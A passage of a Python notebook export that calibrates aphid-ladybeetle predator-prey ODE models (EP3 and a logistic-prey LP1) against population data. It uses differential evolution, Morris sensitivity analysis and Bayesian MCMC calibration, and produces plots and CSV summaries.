residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[197]:
from scipy import optimize
seed = 1234
r1=0.001333498834664657
a1=0.029060190883154886
a2=2.774935164202579e-05
a3=0.003448649713284258
denom_min = 0.1
denom_max = 1.9
bounds_EP3 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_EP3 = optimize.differential_evolution(
EP3_least_squares_error_ode,
bounds=bounds_EP3,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
EP3_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_EP3)
# * Retrieving the calibrated parameter values:
# In[198]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_EP3.x
solution_ODE_EP3 = EP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_EP3.x
)
t_computed_EP3, y_computed_EP3 = solution_ODE_EP3.t, solution_ODE_EP3.y
u_EP3, v_EP3 = y_computed_EP3
parameters_dict = {
"Model": "EP3",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[199]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_EP3, u_EP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_EP3, v_EP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[200]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[201]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = EP3_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
EP3_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[202]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[203]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_EP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[204]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[205]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP3 = EP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP3.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[206]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[207]:
df_sigmai
# In[208]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_EP3.png", dpi=300)
plt.show()
# In[209]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_EP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[210]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[211]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_EP3,
u_EP3,
v_EP3,
EP3_model,
mean_values_params
)
pest_time_derivative_array
# In[212]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_EP3, u_EP3, '-x', label='Pest population')
plt.plot(t_computed_EP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_EP3.png", dpi=300)
plt.show()
# In[213]:
mean_values_params = [
r1,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[214]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_EP3 = EP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_EP3.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
EP3_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[215]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[216]:
df_sigmai
# In[217]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_EP3.png", dpi=300)
plt.show()
# In[218]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_EP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[219]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def EP3_ode_wrapper(time_exp, r1, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
EP3_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[220]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_EP3:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 10 * percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 10 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP3_model",
EP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 10 * percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 10 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP3_model",
EP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + 10 * percent_calibration) * a1,
)
a2_ = pm.Data("a2", a2)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + 10 * percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"EP3_model",
EP3_ode_wrapper(
time_calibration,
r1_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_EP3:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_EP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[221]:
plt.hist(trace_calibration_EP3['a1'], bins=35)
plt.show()
# In[222]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[223]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_EP3[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_EP3.png")
# In[224]:
az.plot_pair(
trace_calibration_EP3,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_EP3.png")
# In[225]:
df_stats_summary = az.summary(
data=trace_calibration_EP3,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[226]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[227]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_EP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_EP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[228]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_EP3["EP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_EP3["EP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_EP3["EP3_model"], 50, axis=0)
# In[229]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_EP3.png", dpi=300)
plt.show()
# In[230]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_EP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_EP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[231]:
df_realizations
# # Logistic Prey Growth FR1 model
# In[232]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def LP1_model(
t,
X,
r1 = 1,
r2 = 2,
a1 = 1,
):
u, v = X
u_prime = r1 * u - r2 * u * u - a1 * u * v
v_prime = 0
return u_prime, v_prime
def LP1_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 2,
a1 = 1,
):
solution_ODE = solve_ivp(
fun=LP1_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,a1),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[233]:
def LP1_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[234]:
from scipy import optimize
seed = 1234
r1=0.0025591841125063588
r2=4.3094146773353513e-11
a1=0.005814656330586127
denom_min = 0.1
denom_max = 1.9
bounds_LP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_LP1 = optimize.differential_evolution(
LP1_least_squares_error_ode,
bounds=bounds_LP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
LP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_LP1)
# * Retrieving the calibrated parameter values:
# In[235]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
a1_deterministic,
) = result_LP1.x
solution_ODE_LP1 = LP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_LP1.x
)
t_computed_LP1, y_computed_LP1 = solution_ODE_LP1.t, solution_ODE_LP1.y
u_LP1, v_LP1 = y_computed_LP1
parameters_dict = {
"Model": "LP1",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[236]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_LP1, u_LP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_LP1, v_LP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[237]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[238]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = LP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
LP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[239]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[240]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_LP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
